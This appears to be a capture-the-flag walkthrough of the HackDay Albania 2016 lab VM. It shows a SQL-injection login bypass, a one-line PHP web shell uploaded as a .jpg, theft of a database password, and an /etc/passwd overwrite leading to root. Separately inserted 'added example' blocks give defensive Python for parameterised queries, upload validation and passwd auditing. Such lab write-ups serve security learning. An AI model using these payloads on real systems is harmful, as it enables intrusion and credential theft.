Untitled

a guest, Nov 29th, 2016
# Let's check our virtual machine IP:

Currently scanning: 192.168.6.0/16   |   Screen View: Unique Hosts

2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 84
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.84    08:00:27:98:0d:5f      1      42  CADMUS COMPUTER SYSTEMS
(...)


# With that IP, let's scan it to check what's going on:

tlopes@blackbox:~$ nmap -p 1-65535 -v -A -T5 192.168.1.84

Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-28 00:02 WET
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Initiating Ping Scan at 00:02
Scanning 192.168.1.84 [2 ports]
Completed Ping Scan at 00:02, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:02
Completed Parallel DNS resolution of 1 host. at 00:02, 0.03s elapsed
Initiating Connect Scan at 00:02
Scanning hackday.lan (192.168.1.84) [65535 ports]
Discovered open port 22/tcp on 192.168.1.84
Discovered open port 8008/tcp on 192.168.1.84
Completed Connect Scan at 00:02, 1.44s elapsed (65535 total ports)
Initiating Service scan at 00:02
Scanning 2 services on hackday.lan (192.168.1.84)
Completed Service scan at 00:02, 6.02s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.84.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.51s elapsed
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Nmap scan report for hackday.lan (192.168.1.84)
Host is up (0.0060s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA)
|_  256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 26 disallowed entries (15 shown)
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HackDay Albania 2016
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds
tlopes@blackbox:~$


-- we can see 2 different services running, on ports 8008 (http) and 22 (ssh)

# Robots.txt shows a lot of disallowed entries, let's check what's there:

tlopes@blackbox:~$ for i in `curl 192.168.1.84:8008/robots.txt | cut -d: -f2`; do echo "======"; echo "Folder: $i"; curl "192.168.1.84:8008$i"; echo ""; done;
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   702  100   702    0     0   307k      0 --:--:-- --:--:-- --:--:--  685k
======
Folder: /rkfpuzrahngvat/
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Hmmmm????</title>
</head>
<body>
    <center><img src="background.jpg"></center>
</body>
</html>
======
Folder: /slgqvasbiohwbu/
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Hmmmm????</title>
</head>
<body>
    <center><img src="background.jpg"></center>
</body>
</html>
======
Folder: /tmhrwbtcjpixcv/

(...)

======
Folder: /unisxcudkqjydw/
IS there any /vulnbank/ in there ???

======

# Opening http://192.168.1.84:8008/unisxcudkqjydw/vulnbank/ and then going to "client/login.php"
-- it was possible to see a login form

# Submitting the form with the variable names changed to arrays (username[] and password[]) gave the following error:

Notice: Array to string conversion in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 101
Notice: Array to string conversion in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 101
Invalid Credentials . . .

-- I tried some variants but nothing special happened

# I ran hydra to try some user/pass combinations, but without luck
hydra 192.168.122.95 -s 8008 http-post-form "/unisxcudkqjydw/vulnbank/client/login.php:username=^USER^&password=^PASS^:Invalid"

# At the same time, I ran sqlmap, which found one blind injection.
-- I had no luck getting sqlmap to dump the database for me, so I did it myself:
.. after some tries, I was able to bypass the form using the following combination:

username: ' or 'a' = 'a' --
password: #
  136.  
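Why that pair logs you in, and what the fix looks like, as an added example that is not part of the original writeup: the login query is built by string concatenation, so the quote closes the username literal, `or 'a' = 'a'` makes the WHERE clause true for every row, and the comment marker discards the password check. The demo below reproduces that against a constructed in-memory SQLite table (the real vulnbank schema and column names are unknown; `clients`, `alice` and `s3cret` are made up) and sets it beside a parameterised query that also rejects the `username[]` array trick from the earlier probe.

```python
# Added example, not code from the writeup or from the vulnbank application.
# Demonstrates the concatenation bug behind the bypass and the hardened form.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed demo table standing in for the bank's client table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clients (username TEXT, password TEXT)")
    conn.execute("INSERT INTO clients VALUES ('alice', 's3cret')")
    return conn


def login_vulnerable(conn, username, password):
    """The broken pattern: user input is pasted straight into the SQL text.
    In SQLite '--' comments out the rest of the line, so the injected
    username throws away the AND password = ... clause entirely."""
    sql = ("SELECT username FROM clients WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Hardened version: reject non-string input (PHP's 'Array to string
    conversion' notice came from username[]), then bind the values as
    parameters so quotes and comment markers stay data, never SQL."""
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    sql = ("SELECT username FROM clients WHERE username = ? "
           "AND password = ?")
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# The exact pair used in the writeup.
PAYLOAD_USER = "' or 'a' = 'a' --"
PAYLOAD_PASS = "#"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", login_vulnerable(conn, PAYLOAD_USER, PAYLOAD_PASS))
    print("safe:      ", login_safe(conn, PAYLOAD_USER, PAYLOAD_PASS))
    print("safe/legit:", login_safe(conn, "alice", "s3cret"))
```

The vulnerable function returns the first account in the table for the payload; the safe one returns nothing for it and still authenticates a genuine user, which is the behaviour a fix for config.php line 101 would need to show.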
# On the new page there's a "Contact Support" form
-- I tried to upload a .php file but it failed (only images allowed)
-- so I renamed the file to .jpg and it worked!

tlopes@blackbox:~$ cat shell.jpg
<?php
system($_GET['cmd']);

# Testing the PHP:

-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

# It worked! Command execution on the box as www-data
  151.  
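The upload check only looked at the file name, so a `.jpg` full of PHP got through, and view_file.php then handed it to the PHP interpreter instead of serving it as an image. As an added example (not the writeup's or the vulnbank project's code), here is the defensive counterpart: decide on content rather than name, refuse anything carrying a PHP open tag even when it has a valid image header in front of it, and store the file under a server-chosen random name so the client's file name never reaches disk. All sample blobs are constructed here.

```python
# Added example, not from the writeup. Content-based upload validation.
import os
import secrets

# Magic bytes of the image types the "Contact Support" form claims to accept.
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Open tags that must never appear inside something served from the web root.
PHP_TAGS = (b"<?php", b"<?=", b"<script language=\"php\"")


def detect_image_type(data: bytes):
    """Return the extension implied by the leading bytes, or None."""
    for sig, ext in IMAGE_SIGNATURES.items():
        if data.startswith(sig):
            return ext
    return None


def validate_upload(client_name: str, data: bytes):
    """Return (ok, reason_or_ext). The client-supplied name is accepted only
    for logging; the decision is made on the bytes alone."""
    ext = detect_image_type(data)
    if ext is None:
        return False, "not a recognised image (magic bytes)"
    if any(tag in data.lower() for tag in PHP_TAGS):
        # Polyglot: genuine image header with PHP appended or embedded.
        return False, "php tag inside image body"
    return True, ext


def store_upload(upload_dir: str, data: bytes) -> str:
    """Write under a random name we chose, never the client's file name."""
    ok, ext = validate_upload("ignored", data)
    if not ok:
        raise ValueError(ext)
    name = secrets.token_hex(16) + "." + ext
    with open(os.path.join(upload_dir, name), "wb") as fh:
        fh.write(data)
    return name


# Constructed samples: what the writeup uploaded, a polyglot, a real JPEG start.
RENAMED_PHP = b"<?php\nsystem($_GET['cmd']);\n"
POLYGLOT = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"<?php echo 1; ?>"
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32

if __name__ == "__main__":
    for label, blob in [("shell.jpg", RENAMED_PHP), ("polyglot", POLYGLOT),
                        ("photo", REAL_JPEG)]:
        print(label, validate_upload(label, blob))
```

Validation alone is not the whole fix: the upload directory should sit outside the document root (or have PHP execution disabled for it), and a viewer script should read the file and send it with an image Content-Type rather than include or execute it, so a file that slips past the check still cannot run.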
# Checking what's in the current dir

-- http://192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=ls%20-al
total 52
drwxrwxr-x 4 taviso taviso 4096 Oct 20 12:28 .
drwxrwxr-x 3 taviso taviso 4096 Oct 20 12:31 ..
-rwxr-xr-x 1 taviso taviso   87 Oct 19 08:31 client.php
-rwxr-xr-x 1 taviso taviso 4137 Oct 20 12:27 config.php
drwxr-xr-x 2 taviso taviso 4096 Oct 19 08:15 images
-rwxr-xr-x 1 taviso taviso  403 May 23  2016 index.php
-rwxr-xr-x 1 taviso taviso  348 Oct 20 11:58 login.php
-rwxr-xr-x 1 taviso taviso   81 May 22  2016 logout.php
-rwxr-xr-x 1 taviso taviso 1198 Oct 20 12:28 ticket.php
drwxrwxrwx 2 taviso taviso 4096 Nov 28 01:17 upload
-rwxr-xr-x 1 taviso taviso  532 Oct 19 08:29 view_file.php
-rwxr-xr-x 1 taviso taviso 1029 Oct 19 08:29 view_ticket.php

# Checking config.php

-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20config.php
(...)
$db_host = "127.0.0.1";
$db_name = "bank_database";
$db_user = "root";
$db_password = "NuCiGoGo321";
(...)

# Dumping all databases:

-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=mysqldump%20-uroot%20-pNuCiGoGo321%20--all-databases
Nothing relevant in the dump

# ps axu, init.d, cron.d and other relevant folders didn't return anything valuable to attack

# Tried to exploit mysqld with race conditions to escalate privileges, but it failed due to permissions

# After some time searching through configurations I found that /etc/passwd was world-writable:
-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=ls%20-alhtr%20/etc%20|%20grep%20passwd
-rw-------  1 root root   1.6K Oct  9 13:13 passwd-
-rw-r--rw-  1 root root   1.6K Oct 22 17:21 passwd


# Listing all users available:
-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash


# Let's try to change the "taviso" account's password to a known one
-- first simulating it on my own computer:

tlopes@blackbox:~$ sudo adduser deleteme
[sudo] password for tlopes:
Adding user `deleteme' ...
Adding new group `deleteme' (1001) ...
Adding new user `deleteme' (1001) with group `deleteme' ...
Creating home directory `/home/deleteme' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for deleteme
Enter the new value, or press ENTER for the default
    Full Name []:
    Room Number []:
    Work Phone []:
    Home Phone []:
    Other []:
Is the information correct? [Y/n]

tlopes@blackbox:~$ sudo cat /etc/shadow | grep deleteme
deleteme:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:17133:0:99999:7::

# Let's use the previous hash as a template to create the new "taviso" entry:

taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash


# Now, let's remove taviso from /etc/passwd
192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=sed%20%27/taviso/d%27%20/etc/passwd%20>%20/tmp/passwd.bk
192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cp%20/tmp/passwd.bk%20/etc/passwd

# And add our new "taviso" entry created in the previous step:

-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=echo%20%27taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash%27%20%3E%3E%20/etc/passwd

# Confirming that everything went ok:
-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20/etc/passwd%20|%20grep%20taviso

Yup, the account is there with our password "password"

taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash
  274.  
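The escalation above needed two things that a host audit catches cheaply: the world-writable /etc/passwd found earlier (`-rw-r--rw-`), and a passwd entry whose second field holds a crypt hash instead of the `x` that defers to /etc/shadow. As an added example (not the writeup's code), the audit below covers both: it checks the mode bits of the account files against the expected values and parses passwd lines for hash-bearing, empty-password or non-root UID-0 entries. The sample lines and mode are taken from this writeup's listings; `run_live()` applies the same checks read-only to the host it runs on.

```python
# Added example, not from the writeup. Detects the two conditions that made
# the /etc/passwd rewrite possible: loose file modes and hashes in passwd.
import os
import stat

ACCOUNT_FILES = {
    "/etc/passwd": 0o644,   # expected mode; anything wider is a finding
    "/etc/shadow": 0o640,
    "/etc/group": 0o644,
    "/etc/gshadow": 0o640,
}


def mode_findings(path: str, mode: int, expected: int):
    """Report permission bits present in `mode` beyond `expected`."""
    findings = []
    perm = stat.S_IMODE(mode)
    if perm & stat.S_IWOTH:
        findings.append("%s is world-writable (%o)" % (path, perm))
    if perm & ~expected:
        findings.append("%s mode %o wider than expected %o"
                        % (path, perm, expected))
    return findings


def passwd_findings(lines):
    """Flag entries whose password field is not a shadow marker, entries
    with an empty password field, and any UID-0 account other than root."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append("malformed entry: %s" % line[:40])
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append("%s has an empty password field" % user)
        elif pw not in ("x", "*", "!"):
            findings.append("%s carries a hash in /etc/passwd" % user)
        if uid == "0" and user != "root":
            findings.append("%s has UID 0" % user)
    return findings


def run_live():
    """Apply both checks to the running system (read-only)."""
    out = []
    for path, expected in ACCOUNT_FILES.items():
        try:
            out += mode_findings(path, os.stat(path).st_mode, expected)
        except OSError:
            continue
    try:
        with open("/etc/passwd") as fh:
            out += passwd_findings(fh)
    except OSError:
        pass
    return out


# Constructed from the writeup: the modified entry, plus the ls output mode.
SAMPLE_PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin",
    "taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3."
    "TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash",
]
SAMPLE_PASSWD_MODE = 0o100646   # -rw-r--rw- as seen in the ls listing

if __name__ == "__main__":
    for f in mode_findings("/etc/passwd", SAMPLE_PASSWD_MODE, 0o644):
        print(f)
    for f in passwd_findings(SAMPLE_PASSWD):
        print(f)
```

On the modified machine this reports /etc/passwd as world-writable and `taviso` as carrying a hash in /etc/passwd; on a correctly configured host both lists come back empty. A file integrity monitor watching /etc/passwd would have caught the same change as it happened.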
# Now let's try to connect using SSH to this account:

tlopes@blackbox:~$ ssh taviso@192.168.1.84
The authenticity of host '192.168.1.84 (192.168.1.84)' can't be established.
ECDSA key fingerprint is SHA256:IWIi1cnAziEW50tRA6HT1S4Zp/bo+pjpAvJ3FddNSOE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.84' (ECDSA) to the list of known hosts.
taviso@192.168.1.84's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

36 packages can be updated.
2 updates are security updates.


*** System restart required ***
Last login: Sat Oct 29 23:07:00 2016
-bash: warning: setlocale: LC_CTYPE: cannot change locale (pt_PT.UTF-8)
taviso@hackday:~$


-- BAM!

# Let's see if taviso is in the sudoers file:

taviso@hackday:~$ sudo -i
[sudo] password for taviso:
-bash: warning: setlocale: LC_CTYPE: cannot change locale (pt_PT.UTF-8)
root@hackday:~#

-- BAM!

# Let's see what root has in his home dir

root@hackday:~# ls -al
total 28
drwx------  3 root root 4096 Oct 22 17:21 .
drwxr-xr-x 23 root root 4096 Nov 28 01:02 ..
-rw-------  1 root root   58 Oct 22 17:21 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwxr-xr-x  2 root root 4096 Oct  9 13:18 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   61 Oct  9 13:36 flag.txt

-- BAM! a flag :)

root@hackday:~# cat flag.txt
Urime,
Tani nis raportin!

d5ed38fdbf28bc4e58be142cf5a17cf5